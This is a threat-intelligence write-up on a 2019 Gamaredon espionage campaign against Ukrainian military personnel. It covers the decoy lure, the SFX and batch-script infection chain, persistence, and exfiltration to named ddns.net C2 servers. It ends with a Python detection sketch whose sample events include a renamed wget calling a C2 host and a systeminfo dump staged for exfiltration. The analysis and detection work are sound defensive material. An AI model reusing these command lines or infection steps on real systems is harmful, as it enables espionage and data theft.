Cyber Incident Victim: Ministry of Defence of Ukraine
Date: Apr 2019
Location: Ukraine
Summary
A cyber espionage campaign targeted Ukrainian military personnel using a malicious executable disguised as a legitimate RTF document containing armed forces information. The attack, attributed to the Russian Gamaredon APT group, deployed a multi-stage infection chain of self-extracting archives and batch scripts that established persistence through a Startup-folder entry. The final payload, a variant of the long-standing Pteranodon implant, harvested system information and exfiltrated it to command-and-control servers while periodically retrieving additional malicious tools such as repackaged wget utilities. The infrastructure remained active with consistent operational patterns, reflecting the group's continued focus on Eastern European targets through established malware frameworks.
Description
In April 2019, cybersecurity researchers identified a campaign targeting Ukrainian military personnel through a malicious executable masquerading as a legitimate RTF document titled "State of the Armed Forces of Ukraine," dated April 2, 2019. The lure was a self-extracting archive (SFX) whose metadata falsely associated it with Oracle software; its digital signature was invalid and carried an expiration date of March 16, 2019. On execution, the SFX dropped four files, including a batch script that drove the infection sequence. The script first used tasklist.exe to check for running security analysis tools such as Wireshark and Process Explorer. It then renamed an embedded file to "Document.docx" and displayed it as a decoy while extracting a password-protected archive ("26710") with the hard-coded password "dcthfdyjdfcdst,tv". This archive placed "winsetup.exe" in the user's profile directory and established persistence through an LNK shortcut in the Windows Startup folder. The second-stage SFX contained "MicrosoftCreate.exe", a UPX-packed build of the wget utility for Windows, and "30347.cmd", the script that orchestrated the Pteranodon implant's malicious activity.

The Pteranodon implant ran systeminfo.exe to gather host data, wrote the output to a file named "fnQWAZC" and exfiltrated it with wget to the command-and-control (C2) server "librework.ddns.net". The malware registered two recurring scheduled tasks: one downloaded "setup.exe" from "bitwork.ddns.net", and the other placed "ie_cash.exe" (a further wget copy) in "%APPDATA%\Roaming\Microsoft\IE\". A secondary task ran every 32 minutes to execute the downloaded payloads. Analysis confirmed that the infrastructure was still active in early April 2019, with multiple samples connecting to the same C2. The code patterns matched the Gamaredon APT group's historical tactics, in particular the Pteranodon implant, which the group had maintained since 2013. Ukraine's CERT (CERT-UA) corroborated the group's focus on Eastern European targets, consistent with broader Russian state-sponsored activity against Ukrainian entities during this period. The incident highlighted sustained cyber espionage against Ukrainian defence infrastructure, though the available sources did not disclose specific operational impacts or containment measures.
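As an added illustration (not part of the original write-up), the following Python sketch turns the behaviours described above into simple process-creation detection rules and runs them over constructed sample events. The event shape, field names and exact command lines are assumptions; the host names, file names and the 32-minute interval are taken from the description.

```python
import re
from typing import NamedTuple

class ProcEvent(NamedTuple):
    parent: str   # parent process image name
    image: str    # process image name
    cmdline: str  # full command line as logged

# Constructed sample events (not real telemetry). Host names, file names and the
# 32-minute interval come from the write-up; everything else is invented here.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "cmd.exe", r"cmd.exe /c C:\Users\u\AppData\Local\Temp\30347.cmd"),
    ProcEvent("cmd.exe", "tasklist.exe", 'tasklist.exe /FI "IMAGENAME eq Wireshark.exe"'),
    ProcEvent("cmd.exe", "cmd.exe", "cmd.exe /c systeminfo.exe > fnQWAZC"),
    ProcEvent("cmd.exe", "MicrosoftCreate.exe", "MicrosoftCreate.exe -q http://librework.ddns.net/"),
    ProcEvent("cmd.exe", "schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 32 /tn upd /tr "%APPDATA%\Roaming\Microsoft\IE\ie_cash.exe"'),
    ProcEvent("explorer.exe", "winword.exe", r'"C:\Program Files\Microsoft Office\winword.exe" Document.docx'),
]

ANALYSIS_TOOLS = re.compile(r"wireshark|procexp|process\s*explorer", re.I)

def minute_interval(cmdline):
    """Interval in minutes from a 'schtasks /create /sc minute /mo N' line, else None."""
    m = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", cmdline, re.I)
    return int(m.group(1)) if m else None

# One rule per behaviour in the infection chain; each is a predicate on a single event.
RULES = {
    # defence evasion: enumerating running processes for analysis tools
    "analysis_tool_probe": lambda e: e.image.lower() == "tasklist.exe"
    and ANALYSIS_TOOLS.search(e.cmdline) is not None,
    # discovery: host inventory redirected to a file for later exfiltration
    "systeminfo_to_file": lambda e: re.search(r"systeminfo(\.exe)?\s*>", e.cmdline, re.I) is not None,
    # C2 / download: any command line naming a dynamic-DNS host
    "dyndns_contact": lambda e: ".ddns.net" in e.cmdline.lower(),
    # persistence: task at minute granularity (implant used 32 min); None means no minute schedule
    "short_interval_task": lambda e: e.image.lower() == "schtasks.exe"
    and (minute_interval(e.cmdline) or 10**6) <= 60,
    # execution: an executable planted under ...\Microsoft\IE\ in the user profile
    "appdata_ie_binary": lambda e: re.search(r'\\microsoft\\ie\\[^\\\s"]+\.exe', e.cmdline, re.I) is not None,
}

def triage(events):
    """Map event index -> names of rules that fired, keeping only events with a hit."""
    hits = {i: [n for n, r in RULES.items() if r(e)] for i, e in enumerate(events)}
    return {i: names for i, names in hits.items() if names}

if __name__ == "__main__":
    for i, names in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: {SAMPLE_EVENTS[i].image} -> {', '.join(names)}")
```

Each rule keys on the behaviour rather than the file name, so a renamed wget or a different dynamic-DNS host still fires; the decoy document open and the initial script launch intentionally produce no hit on their own.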
